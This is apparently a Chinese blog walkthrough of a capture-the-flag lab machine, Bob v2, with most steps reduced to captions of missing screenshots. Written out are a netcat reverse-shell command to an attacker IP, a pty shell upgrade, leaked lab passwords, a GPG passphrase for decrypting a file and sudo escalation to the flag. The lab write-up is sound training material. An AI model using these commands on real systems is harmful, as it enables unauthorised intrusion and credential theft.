Nmap端口扫描:
渗透测试之BobV2
发现robots.txt
渗透测试之BobV2
Login.php不存在,其他的页面也没有什么用
渗透测试之BobV2
发现一个可以执行命令的页面:
渗透测试之BobV2Ls命令估计被过滤了:
渗透测试之BobV2
又学一个:lsattr查看文件属性
渗透测试之BobV2
发现有一个备份文件:存在两处过滤,无法使用nc反弹shell,使用下面的命令反弹成功。(bash反弹失败)
渗透测试之BobV2
反弹shell:/bin/nc -e /bin/sh 10.1.1.1 1234
渗透测试之BobV2
渗透测试之BobV2
美化shell:Python -c “Import pty;pty.spawn(‘/bin/bash’);”
渗透测试之BobV2
查看id,groups:
渗透测试之BobV2
渗透测试之BobV2
看一下sudo配置:
渗透测试之BobV2
翻一下目录啥的:
渗透测试之BobV2
渗透测试之BobV2

里面应该是有多个用户:再查看一下/etc/passwd
渗透测试之BobV2
进入elliot文件夹:查看到theadminisdumb.txt
渗透测试之BobV2
查看一下文件,里面暴露了elliot和jc的密码。
渗透测试之BobV2
渗透测试之BobV2
渗透测试之BobV2
之后再翻bob的目录:
渗透测试之BobV2
有一个login.txt.gpg,是加密文件,之后又翻Secret文件夹,最后会发现一个sh文件,运行。
渗透测试之BobV2
居然是一个藏头诗,成功获取解密密码:HARPOCRATES。这里要补充一下gpg的解密相关知识:
渗透测试之BobV2
查看版本:
渗透测试之BobV2
自动解密命令:gpg –batch –passphrase HARPOCRATES -d login.txt.gpg
解密成功:
渗透测试之BobV2
看其他的blog都要下载文件,但是直接解密成功了,估计是我登陆了其他用户的关系。
Nc实现文件发送:
目标机输入命令:
渗透测试之BobV2
攻击机输入:
渗透测试之BobV2
结果:
渗透测试之BobV2
登录bob,获取flag:是sudo组
渗透测试之BobV2
修改一下密码先:
渗透测试之BobV2
获取flag:
渗透测试之BobV2

相关文章:

  • 2021-08-14
  • 2021-12-03
  • 2022-01-16
  • 2021-05-10
  • 2021-07-29
  • 2022-12-23
  • 2021-05-08
猜你喜欢
  • 2021-06-26
  • 2021-12-23
  • 2021-04-07
  • 2021-05-21
  • 2021-07-07
  • 2021-06-20
  • 2021-05-27
相关资源
相似解决方案